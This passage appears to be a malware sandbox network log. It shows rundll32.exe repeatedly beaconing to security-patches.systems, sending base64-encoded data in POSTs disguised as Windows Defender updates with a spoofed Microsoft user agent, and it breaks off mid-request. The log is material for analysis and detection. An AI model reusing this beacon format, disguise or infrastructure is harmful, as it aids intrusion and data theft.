                                              Dec 6, 2024 22:20:56.693231106 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:56 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.449817185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:20:56.950488091 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:58.448982000 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:58 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              31192.168.2.449823185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:20:58.778930902 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:00.252599955 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:59 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              32192.168.2.449829185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:00.515227079 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:02.166407108 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:01 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              33192.168.2.449831185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:02.437602997 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:03.884746075 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:03 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              34192.168.2.449836185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:04.152476072 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:05.618777037 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:05 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              35192.168.2.449842185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:05.900727034 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:07.634815931 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:07 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              36192.168.2.449848185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:08.539426088 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:09.995704889 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:09 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              37192.168.2.449854185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:10.263849974 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:11.742902994 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:11 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              38192.168.2.449860185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:12.076178074 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:13.572065115 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:13 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              39192.168.2.449865185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:13.842061996 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:15.288995028 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:14 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              40192.168.2.449866185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:15.560359955 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:17.269184113 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:16 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              41192.168.2.449870185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:17.526896954 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:18.991676092 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:18 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              42192.168.2.449876185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 6, 2024 22:21:19.251430988 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:20.714920044 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:20 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.449881185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:21.039338112 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:22.532628059 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:22 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.449885185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:22.794574976 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:24.372997046 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:24 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.449891185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:24.636548042 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:26.069452047 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:25 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.449895185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:26.417602062 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:27.990735054 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:27 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.449901185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:28.247754097 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:29.766406059 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:29 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.449906185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:30.041013956 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:31.503984928 CET  218  IN  HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:31 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.449910185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Dec 6, 2024 22:21:31.768332005 CET  461  OUT  POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
